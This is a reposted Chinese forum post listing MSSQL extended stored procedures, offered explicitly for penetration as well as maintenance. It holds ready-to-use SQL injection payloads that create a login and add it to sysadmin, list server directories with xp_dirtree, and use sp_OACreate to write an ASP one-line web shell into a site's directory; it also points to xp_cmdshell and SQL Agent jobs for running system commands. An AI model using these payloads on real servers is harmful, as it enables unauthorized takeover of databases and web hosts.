[转载]MSSQL中一些有用的存储扩展
文章作者:Jambalaya & tob88因为最近由这方面的项目,所以花时间整理了一下贴了出来,最后面的是我经常用得,好像还没什么人知道。。。。。。
我大致整理了一些存储扩展,是我知道的比较有用的和我看书的时候找到的,所以可能写得不全,大家还知道什么好用的贴出来,不管是渗透用的还是安全维护用得到的都可以贴出来,然后把所有人的知识点结合在一起就可以相容贯通了~~~
/////////////////////////////////////////////////
xp_cmdshell 执行命令
sp_addextendedproc 还原用的
xp_regread 读注册表
xp_reg* 有很多其他的和注册表相关操作,读是比较有用的
sp_makewebtask 将表中内容导出asp文件
//上面的太熟悉了吧
/////////////////////////////////////////////////////////////
sp_addlogin 添加权限
sp_password 更改密码
sp_addsrvrolemember 添加到管理员组
//;exec master.dbo.sp_addlogin jam;--
//;exec master.dbo.sp_password null,ffffff,jam;--
//;exec master.dbo.sp_addsrvrolemember sysadmin jam;--
//////////////////////////////////////////////////////////////
sp_OACreate 创建OLE对象实例
sp_OAMethod
这个不知道大家是不是接触过,所以举个例子:
;DECLARE @fs int,@fi int EXEC SP_OAcreate 'Scripting.FileSystemObject',@fs OUTPUT EXEC SP_OAMETHOD @fs,'createTextFile',@fs OUTPUT,'e:\GameEMS\cha8.asp',1 EXEC SP_OAMETHOD @fs,'WriteLine',null,'<%25 if request("x")<>"" then execute(request("x"))%25>';--
////////////////////////////////////////////////////////////////
xp_dirtree 列目录
//这个应该也比较熟悉了吧
//exec master..xp_dirtree 'E:\GameEMS\',1,1;--
////////////////////////////////////////////////////////////////
//添加作业的一些东西sp_add_job
sp_add_jobstep
sp_add_jobserver
sp_start_job
//举例:
//exec sp_add_job @job_name='Jam';
//exec sp_add_jobstep @job_name='Jam',@step_name = 'JEXEC',@subsystem='tsql',@command='exec sp_dboption ''sales'', ''read only'', ''true''';//执行系统命令也可以
//exec sp_add_jobserver @job_name = 'Jam',@server_name = 'Admin_GAME';
//exec sp_start_job @job_name='Jam';
//////////////////////////////////////////////////////////////////
//下面是我偶尔会用到的一些东西,大家自己琢磨怎么配合着用吧,具体的可以查阅SQL Server联机丛书
sp_rename 更改列名表名
sp_renamedb 更改数据库名
xp_servicecontrol 启动或停止一个win服务
xp_terminate_process 关闭进程
xp_logininfo 当前登录帐号
sp_configure 检索数据库中的内容(我觉得这个挺有用的)
sp_helpextendedproc 得到所有的存储扩展
sp_who2 查询用户,他们登录的主机,他们在数据库中执行的操作等等
/////////////////////////////////////////////////////////////////////
BTW:我整理的时候看到两个可能会非常有用的,暂时没有贴,准备研究一下确认能够达到目的再贴了~~~哈哈~~~~~
exec sp_droplogin 'golder' --删除SQL用户golder
解释:exec sp_droplogin '删除的用户名';
exec sp_addsrvrolemember 'golder', sysadmin --添加用户到SQL管理员
解释:exec sp_addsrvrolemember '添加的用户名', sysadmin
sysadmin为管理员权限;
exec sp_dropsrvrolemember 'golder', sysadmin --删除SQL管理员权限
解释:exec sp_dropsrvrolemember '删除管理员权限的用户名', sysadmin
页:
[1]